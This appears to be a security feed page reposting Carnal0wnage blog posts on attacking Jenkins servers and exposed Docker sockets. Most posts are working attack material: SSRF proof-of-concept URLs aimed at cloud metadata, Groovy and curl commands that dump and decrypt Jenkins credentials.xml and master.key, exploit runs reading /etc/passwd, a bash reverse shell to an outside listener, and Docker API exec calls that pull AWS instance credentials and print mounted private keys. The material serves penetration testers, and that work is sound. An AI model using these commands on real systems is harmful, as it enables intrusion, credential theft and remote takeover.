< Back to JetLib.com

jetlib.sec » Items by CG

Feeds

268064 items (21 unread) in 27 feeds

« Expand/Collapse

Items by CG

March 05, 2019
11:01
Jenkins - CVE-2018-1000600 PoC
» ‎ Carnal0wnage
second exploit from the blog post

https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html

Chained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRF
https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915

This affects the GitHub plugin that is installed by default. However, I learned that when you spin up a new jenkins instance it pulls all the updated plugins (also by default) I'm honestly not sure how often people set update to latest plugin on by default but it does seem to knock down some of this stuff.

exploit works against: GitHub Plugin up to and including 1.29.1

When i installed Jenkins today (25 Feb 19) it installed 1.29.4 by default thus the below does NOT work.

From the blog post:

CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials
It can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this?(Or if someone know how to obtain credentials ID, please tell me!)
Although it can’t extract any credentials without known credentials ID, there is still another attack primitive - a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!
PoC:
```
http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai
```
To get old versions of the plugin and info you can go to
https://wiki.jenkins.io/display/JENKINS/GitHub+Branch+Source+Plugin

download old versions
https://updates.jenkins.io/download/plugins/github-branch-source/
https://updates.jenkins.io/download/plugins/github/
Tags: devops
March 04, 2019
19:26
Jenkins - messing with exploits pt3 - CVE-2019-1003000
» ‎ Carnal0wnage

References:

https://www.exploit-db.com/exploits/46453
http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html

This post covers the Orange Tsai Jenkins pre-auth exploit

Vuln versions: Jenkins < 2.137 (preauth)

Pipeline: Declarative Plugin up to and including 1.3.4
Pipeline: Groovy Plugin up to and including 2.61
Script Security Plugin up to and including 1.49 (in CG's testing 1.50 is also vuln)

The exploitdb link above lists a nice self contained exploit that will compile the jar for you and serve it up for retrieval by the vulnerable Jenkins server.

nc -l 8888 -vv

whoami
bash: no job control in this shell
bash-3.2$ jenkins

After Jenkins 2.138 the preauth is gone but if you have an overall read token and the plugins are still vulnerable you can still exploit that server. You can just add your cookie to the script and it will hit the url with your authenticated cookie and you can still exploit the server.

Tags: devops
18:16
Jenkins - Identify IP Addresses of nodes
» ‎ Carnal0wnage

While doing some research I found several posts on stackoverflow asking how to identify the IP address of nodes. You might want to know this if you read the decrypting credentials post and managed to get yourself some ssh keys for nodes but you cant actually see the node's IP in the Jenkins UI.

Stackoverflow link: https://stackoverflow.com/questions/14930329/finding-ip-of-a-jenkins-node
blog on setting up a node: https://embeddedartistry.com/blog/2017/12/22/jenkins-configuring-a-linux-slave-node

There are great answers in the stackoverflow post on using the script console but in the event you found yourself with just the Jenkins directory or no access to the script console it's pretty easy to get this information.

You can just browse to jenkins-ip/computer/$nodename/config.xml. This request will require the extended read permission.

Optionally if you are on the box or have a backup you can go to jenkins-dir/nodes/$nodename/config.xml

Tags: devops
February 28, 2019
7:22
Jenkins - decrypting credentials.xml
» ‎ Carnal0wnage

If you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:

hashed_pw='$PASSWORDHASH'
passwd = hudson.util.Secret.decrypt(hashed_pw)
println(passwd)

You need to perform this on the the Jenkins system itself as it's using the local master.key and hudson.util.Secret

Screenshot below

Code to get the credentials.xml from the script console

Windows
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c type credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

*nix
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cat credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

If you just want to do it with curl you can hit the scriptText endpoint and do something like this:

Windows:
curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

Also because this syntax took me a minute to figure out for files in subdirectories:

curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+secrets%5C\master.key%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run

*nix
curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

Then to decrypt any passwords:

curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())"

If you are in a position where you have the files but no access to jenkins you can use:
https://github.com/tweksteen/jenkins-decrypt

There is a small bug in the python when it does the regex and i havent bothered to fix it at the time of this post. But here is version where instead of the regex i'm just printing out the values and you can see the decrypted password. The change is line 55.

Edit 4 March 19: the script only regexs for password (line 72), you might need to swap out the regex if there are ssh keys or other secrets...read the credentials.xml file :-)

Edit 8 April 19: This tweet outlines another similar way
https://twitter.com/netmux/status/1115237815590236160
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f2f2f2; background-color: #000000} span.s1 {font-variant-ligatures: no-common-ligatures}
Tags: devops
February 27, 2019
16:51
Jenkins - SECURITY-180/CVE-2015-1814 PoC
» ‎ Carnal0wnage
Forced API token change

SECURITY-180/CVE-2015-1814

https://jenkins.io/security/advisory/2015-03-23/#security-180cve-2015-1814-forced-api-token-change
Affected Versions
- All Jenkins releases <= 1.605
- All LTS releases <= 1.596.1
PoC
Tested against Jenkins 1.605

Burp output

Validate new token works

Tags: devops
16:14
Jenkins - SECURITY-200 / CVE-2015-5323 PoC
» ‎ Carnal0wnage

API tokens of other users available to admins

SECURITY-200 / CVE-2015-5323
API tokens of other users were exposed to admins by default. On instances that don’t implicitly grant RunScripts permission to admins, this allowed admins to run scripts with another user’s credentials.

Affected versionsAll Jenkins main line releases up to and including 1.637
All Jenkins LTS releases up to and including 1.625.1
PoC Tested against Jenkins 1.6.37

From the script console:
run some groovy code to get the token of another user

wrong token

correct token
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f2f2f2; background-color: #000000} span.s1 {font-variant-ligatures: no-common-ligatures}
Tags: devops
13:46
Jenkins Master Post
» ‎ Carnal0wnage
A collection of posts on attacking Jenkinshttp://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html
Manipulating build steps to get RCE

https://medium.com/@uranium238/shodan-jenkins-to-get-rces-on-servers-6b6ec7c960e2
Using the terminal plugin to get RCE

https://sharadchhetri.com/2018/12/02/managing-jenkins-plugins/
Getting started with Jenkins Plugins

https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
Vulns in
- Pipeline: Declarative Plugin up to and including 1.3.4
- Pipeline: Groovy Plugin up to and including 2.61
- Script Security Plugin up to and including 1.49
Blog post says: This issue has been fixed in Jenkins version 2.121.1 LTS (2.132 weekly).

http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
CVE-2019-1003000 (https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266)

https://github.com/Coalfire-Research/java-deserialization-exploits/tree/master/Jenkins
https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream
CVE-2015-8103 & CVE-2016-0792

https://github.com/nixawk/labs/tree/master/CVE-2017-1000353
https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353
https://www.twistlock.com/2017/06/18/jenkins-java-deserialization/
CVE-2017-1000353 PoC

https://cloud.tencent.com/developer/article/1165414
https://github.com/anntsmart/CVE
CVE-2018-1999002 (windows) Arbitrary file read

A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework. Under Windows, directories that don't exist can be traversed by ../, but not for Linux. Then this vulnerability can be read by any file under Windows. Under Linux, you need to have a directory with _ in the Jenkins plugins directory.

https://www.crowdstrike.com/blog/your-jenkins-belongs-to-us-now-abusing-continuous-integration-systems/
https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/
Decrypting credentials.xml

https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/
Jenkins, windows, powershell

https://securitynews.sonicwall.com/xmlpost/jenkins-ci-server-at-risk-high-risk-vulnerbaility/
https://www.zdnet.com/article/thousands-of-jenkins-servers-will-let-anonymous-users-become-admins/
https://www.cyberark.com/threat-research-blog/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities/
CVE-2018-1999001 malformed request moves the config.xml file, after restart anyone can log in - couple it with a DoS (CVE-2018-1999043) to force restart
- Jenkins weekly up to and including 2.132
- Jenkins LTS up to and including 2.121.1
CG Posts:https://carnal0wnage.attackresearch.com/2019/02/jenkins-messing-with-new-exploits-pt1.html
Username enumeration Jenkins 2.137 and below

https://carnal0wnage.attackresearch.com/2019/02/jenkins-security-200-cve-2015-5323-poc.html
Jenkins - SECURITY-200 / CVE-2015-5323 PoC (API tokens of other users available to admins)

https://carnal0wnage.attackresearch.com/2019/02/jenkins-security-180cve-2015-1814-poc.html
Jenkins - SECURITY-180/CVE-2015-1814 PoC (Forced Token Change)

https://carnal0wnage.attackresearch.com/2019/02/jenkins-decrypting-credentialsxml.html
Decrypting Jenkins credentials.xml

https://carnal0wnage.attackresearch.com/2019/03/jenkins-cve-2018-1000600-poc.html
Jenkins - CVE-2018-1000600 SSRF in GitHub plugin

https://carnal0wnage.attackresearch.com/2019/02/jenkins-messing-with-exploits-pt2-cve.html
Jenkins - CVE-2019-1003000 Pt 1

https://carnal0wnage.attackresearch.com/2019/03/jenkins-messing-with-exploits-pt3-cve.html
Jenkins - CVE-2019-1003000 Pt 2 - Orange Tsai exploit

https://carnal0wnage.attackresearch.com/2019/03/jenkins-identify-ip-addresses-of-nodes.html
Jenkins - Identify IP Addresses of nodes
Tags: devops
12:23
Jenkins - messing with exploits pt2 - CVE-2019-1003000
» ‎ Carnal0wnage

After the release of Orange Tsai's exploit for Jenkins. I've been doing some poking. PreAuth RCE against Jenkins is something everyone wants.

While not totally related to the blog post and tweet the following exploit came up while searching.

What I have figured out that is important is the plug versions as it relates to these latest round of Jenkins exploits. TBH I never paid much attention to the plugins in the past as the issues have been with core Jenkins (as was the first blog post) but you can get a look at them by going to jenkins-server/pluginManager/installed

Jenkins plugin manager
It does require admin permissions or you get this:
No permissions for Jenkins plugin manager

If you do have permissions you can also hit it with the jenkins-cli client and pull the info
$ java -jar jenkins-cli.jar -s http://10.0.0.166:8080/ -auth admin:admin list-plugins
jsch JSch dependency plugin 0.1.55structs Structs Plugin 1.17apache-httpcomponents-client-4-api Apache HttpComponents Client 4.x API Plugin 4.5.5-3.0mailer Mailer Plugin 1.23command-launcher Command Agent Launcher Plugin 1.3workflow-api Pipeline: API 2.33workflow-job Pipeline: Job 2.31ssh-credentials SSH Credentials Plugin 1.14authentication-tokens Authentication Tokens API Plugin 1.3workflow-cps-global-lib Pipeline: Shared Groovy Libraries 2.13jackson2-api Jackson 2 API Plugin 2.9.8pipeline-stage-tags-metadata Pipeline: Stage Tags Metadata 1.3.4.1pipeline-milestone-step Pipeline: Milestone Step 1.3.1credentials Credentials Plugin 2.1.18lockable-resources Lockable Resources plugin 2.4jquery-detached JavaScript GUI Lib: jQuery bundles (jQuery and jQuery UI) plugin 1.2.1workflow-scm-step Pipeline: SCM Step 2.7matrix-auth Matrix Authorization Strategy Plugin 2.3matrix-project Matrix Project Plugin 1.13pipeline-stage-step Pipeline: Stage Step 2.3pipeline-build-step Pipeline: Build Step 2.7pipeline-input-step Pipeline: Input Step 2.9bouncycastle-api bouncycastle API Plugin 2.17handlebars JavaScript GUI Lib: Handlebars bundle plugin 1.1.1momentjs JavaScript GUI Lib: Moment.js bundle plugin 1.1.1plain-credentials Plain Credentials Plugin 1.5docker-commons Docker Commons Plugin 1.13git-client Git client plugin 2.7.6pipeline-rest-api Pipeline: REST API Plugin 2.10workflow-basic-steps Pipeline: Basic Steps 2.14credentials-binding Credentials Binding Plugin 1.17 (1.18)pipeline-stage-view Pipeline: Stage View Plugin 2.10workflow-multibranch Pipeline: Multibranch 2.20script-security Script Security Plugin 1.49 (1.53)git-server GIT server Plugin 1.7workflow-step-api Pipeline: Step API 2.19pipeline-graph-analysis Pipeline Graph Analysis Plugin 1.9pipeline-model-api Pipeline: Model API 1.3.4.1workflow-cps Pipeline: Groovy 2.61 (2.63)branch-api Branch API Plugin 2.1.2jdk-tool JDK Tool Plugin 1.2cloudbees-folder Folders Plugin 6.7durable-task Durable Task Plugin 1.29junit JUnit Plugin 1.27scm-api SCM API Plugin 2.3.0ace-editor JavaScript GUI Lib: ACE Editor bundle plugin 1.1display-url-api Display URL API 2.3.0workflow-support Pipeline: Supporting APIs 3.2

AFAIK you cant enumerate plugins installed and their version without (elevated) authentication like you can with things like WordPress. If you know how, please let me know. For the time being i guess it's just throwing things to see what sticks.

As I mentioned, the latest particular vulns are issues with installed Jenkins plugins. Taking a look at CVE-2019-1003000 (https://nvd.nist.gov/vuln/detail/CVE-2019-1003000) we can see that it affects the Script Security Plugin (the nist.gov says 2.49 but it's a typo and should be 1.49) as seen on the Jenkins advisory https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266

An exploit for the issue exists and is available here: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc it even comes with a docker config to spin up a vulnerable version to try it out on. What's important about this particular exploit is that it IS post auth but it doesn't require script permissions, only Overall/Read permission and Job/Configure permissions.

I'm seeing more and more servers/admins (rightfully) block access to the script & scriptText console because it's well documented that is an immediate RCE.
no script permission
I encourage you to read the whole readme file in the repo but the most important part is here:

A flaw was found in Pipeline: Declarative Plugin before version 1.3.4.1, Pipeline: Groovy Plugin before version 2.61.1 and Script Security Plugin before version 1.50
This PoC is using a user with Overall/Read and Job/Configure permission to execute a maliciously modified build script in sandbox mode, and try to bypass the sandbox mode limitation in order to run arbitrary scripts (in this case, we will execute system command).
As a background, Jenkins's pipeline build script is written in groovy. This build script will be compiled and executed in Jenkins master or node, containing definition of the pipeline, e.g. what to do in slave nodes. Jenkins also provide the script to be executed in sandbox mode. In sandbox mode, all dangerous functions are blacklisted, so regular user cannot do anything malicious to the Jenkins server.

Running the exploit:

python2.7 exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "cat /etc/passwd"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
[+] OUTPUT:
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY
[Pipeline] echo
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
jenkins:x:1000:1000:Linux User,,,:/var/jenkins_home:/bin/bash

[Pipeline] End of Pipeline
Finished: SUCCESS

you can certainly pull a reverse shell from it as well.

python2.7 exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "bash -i >& /dev/tcp/10.0.0.16/4444 0>&1"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
[+] OUTPUT:
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY

and you get:

nc -l 4444 -vv

bash: cannot set terminal process group (7): Not a tty
bash: no job control in this shell
bash-4.4$
bash-4.4$
bash-4.4$ whoami
whoami
jenkins

bash-4.4$

The TLDR is you can use this exploit to get a shell if an older version of the Script Security Plugin is installed and if you have Overall/Read permission and Job/Configure permission which a regular Jenkins user is more inclined to have and this exploit doesn't require using the script console.
Tags: devops
February 26, 2019

Permalink for 'Jenkins - messing with new exploits pt1'

10:46

Jenkins - messing with new exploits pt1

» ‎ Carnal0wnage

Jenkins notes for:
https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html

to download old jenkins WAR files

http://updates.jenkins-ci.org/download/war/

1st bug in the blog is a username enumeration bug in

Jenkins weekly up to and including 2.145
Jenkins LTS up to and including 2.138.1

From the blog:

Pre-auth User Information Leakage
While testing Jenkins, it’s a common scenario that you want to perform a brute-force attack but you don’t know which account you can try(a valid credential can read the source at least so it’s worth to be the first attempt).
In this situation, this vulnerability is useful!Due to the lack of permission check on search functionality. By modifying the keyword from a to z, an attacker can list all users on Jenkins!

PoC:

http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]

/securityRealm/user/admin/search/index?q=a

/securityRealm/user/admin/search/index?q=c

ALERT

Even though the advisory says 2.138_1 i tested against 2.138 and the exploit doesn't work.

SOOOOO you are looking for Jenkins <= 2.137

If jenkins is really old the above should work and also https://nvd.nist.gov/vuln/detail/CVE-2017-1000395 where you can get the email address via similar query.

versions up to (including) 2.73.1
versions up to (including) 2.83

PoC:

http://jenkins.local/securityRealm/user/admin/api/xml

with 2.137 you can get username/id

/securityRealm/user/cg/api/xml

Tags: devops

February 01, 2019
5:32
Abusing Docker API | Socket
» ‎ Carnal0wnage

Notes on abusing open Docker sockets

This wont cover breaking out of docker containers

Ports: usually 2375 & 2376 but can be anything

Refs:

https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0
https://www.slideshare.net/BorgHan/hacking-docker-the-easy-way
https://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html
https://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html
https://infoslack.com/devops/exploring-docker-remote-api
https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf
https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/
https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/
https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124
https://www.exploit-db.com/exploits/42356
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rb
http://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.html
https://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/
https://blog.ropnop.com/plundering-docker-images/

Enable docker socket (Create practice locations)
https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerd

Having the docker API | socket exposed is essentially granting root to any of the containers on the system

The daemon listens on unix:///var/run/docker.sock but you can bind Docker to another host/port or a Unix socket.

The docker socket is the socket the Docker daemon listens on by default and it can be used to communicate with the daemon from within a container, or if configured, outside the container against the host running docker.

All the docker socket magic is happening via the docker API. For example if we wanted to spin up an nginx container we'd do the below:

Create a nginx container

The following command uses curl to send the {“Image”:”nginx”} payload to the /containers/create endpoint of the Docker daemon through the unix socket. This will create a container based on Nginx and return its ID.

$ curl -XPOST --unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create

{"Id":"fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65","Warnings":null}

Start the container

$ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/start

As mentioned above you can also have the docker socket listen on a TCP port

You can validate it's docker by hitting it with a version request

$ curl -s http://open.docker.socket:2375/version | jq

{
"Version": "1.13.1",
"ApiVersion": "1.26",
"MinAPIVersion": "1.12",
"GitCommit": "07f3374/1.13.1",
"GoVersion": "go1.9.4",
"Os": "linux",
"Arch": "amd64",
"KernelVersion": "3.10.0-514.26.2.el7.x86_64",
"BuildTime": "2018-12-07T16:13:51.683697055+00:00",
"PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64"
}

or with the docker client

docker -H open.docker.socket:2375 version

Server:
Engine:
Version: 1.13.1
API version: 1.26 (minimum version 1.12)
Go version: go1.9.4
Git commit: 07f3374/1.13.1
Built: Fri Dec 7 16:13:51 2018
OS/Arch: linux/amd64
Experimental: false

This is basically a shell into the container

Get a list of running containers with the ps command

docker -H open.docker.socket:2375 ps

CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
72cd30d28e5c gogs/gogs "/app/gogs/docker/st…" 5 days ago Up 5 days 0.0.0.0:3000->3000/tcp, 0.0.0.0:10022->22/tcp gogs
b522a9034b30 jdk1.8 "/bin/bash" 5 days ago Up 5 days myjdk8
0f5947860c17 centos/mysql-57-centos7 "container-entrypoin…" 8 days ago Up 8 days 0.0.0.0:3306->3306/tcp mysql
3965c004c7a7 192.168.32.134:5000/tensquare_config:1.0-SNAPSHOT "java -jar /app.jar" 8 days ago Up 8 days 0.0.0.0:12000->12000/tcp config
3f466b754971 42cb59080921 "/bin/bash" 8 days ago Up 8 days jdk8
6499013fdc2d registry "/entrypoint.sh /etc…" 8 days ago Up 8 days 0.0.0.0:5000->5000/tcp registry

Exec into one of the containers

docker -H open.docker.socket:2375 exec -it mysql /bin/bash

bash-4.2$ whoami
mysql

Other commands

Are there some stopped containers?
docker -H open.docker.socket:2375 ps -a

What are the images pulled on the host machine?
docker -H open.docker.socket:2375 images

I've frequently not been able to get the docker client to work well when it comes to the exec command but you can still code exec in the container with the API. The example below is using curl to interact with the API over https (if enabled). to create and exec job, set up the variable to receive the out put and then start the exec so you can get the output.

Using curl to hit the API

Sometimes you'll see 2376 up for the TLS endpoint. I haven't been able to connect to it with the docker client but you can with curl no problem to hit the docker API.

Docker socket to metadata URL
https://docs.docker.com/engine/api/v1.37/#operation/ContainerExec

Below is an example of hitting the internal AWS metadata URL and getting the output

list containers:

curl --insecure https://tls-opendocker.socker:2376/containers/json | jq
[
{
"Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668",
"Names": [
"/docker_snip_1"
],
"Image": "dotnetify",
"ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca",
"Command": "cmd /S /C 'dotnet netify-temp.dll'",
"Created": 1541018555,
"Ports": [
{
"IP": "0.0.0.0",
"PrivatePort": 443,
"PublicPort": 50278,
---SNIP---

List processes in a container:

curl --insecure https://tls-opendocker.socker:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
{
"Processes": [
[
"smss.exe",
"7868",
"00:00:00.062",
"225.3kB"
],
[
"csrss.exe",
"10980",
"00:00:00.859",
"421.9kB"
],
[
"wininit.exe",
"10536",
"00:00:00.078",
"606.2kB"
],
[
"services.exe",
"10768",
"00:00:00.687",
"1.208MB"
],
[
"lsass.exe",
"10416",
"00:00:36.000",
"4.325MB"
],
---SNIP---

Set up and exec job to hit the metadata URL:

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'

{"Id":"4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55"}

Get the output:

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'

{
"Code" : "Success",
"LastUpdated" : "2019-01-29T20:12:58Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIATRSNIP",
"SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP",
"Token" : "FQoGZXIvYXdzEB4aDCQSM0rRV/SNIPSNIPSNIP",
"Expiration" : "2019-01-30T02:43:34Z"
}

Docker secrets
relevant reading https://docs.docker.com/engine/swarm/secrets/

list secrets (no secrets/swarm not set up)

curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq
{ "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."}

list secrets (they exist)

$ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq
[
{
"ID": "9h3useaicj3tr465ejg2koud5",
"Version": {
"Index": 21
},

"CreatedAt": "2018-07-06T10:19:50.677702428Z",
"UpdatedAt": "2018-07-06T10:19:50.677702428Z",
"Spec": {
"Name": "registry-key.key",
"Labels": {} }},

Check what is mounted

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'

{"Id":"7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa"}

Get the output by starting the exec

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'

overlay on / type overlay
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
---SNIP---
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)
tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime)
tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)
tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)
---SNIP---

Cat the mounted secret

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'

{"Id":"3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30"}

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d '{}'

-----BEGIN RSA PRIVATE KEY-----
MIIJKAIBAAKCAgEA1A/ptrezfxUlupPgKd/kAki4UlKSfMGVjD6GnJyqS0ySHiz0
---SNIP---

If you have secrets, it's also worth checking out services in case they are adding secrets via environment variables

curl -s --insecure https://tls-opendocker.socket:2376/services | jq

[{
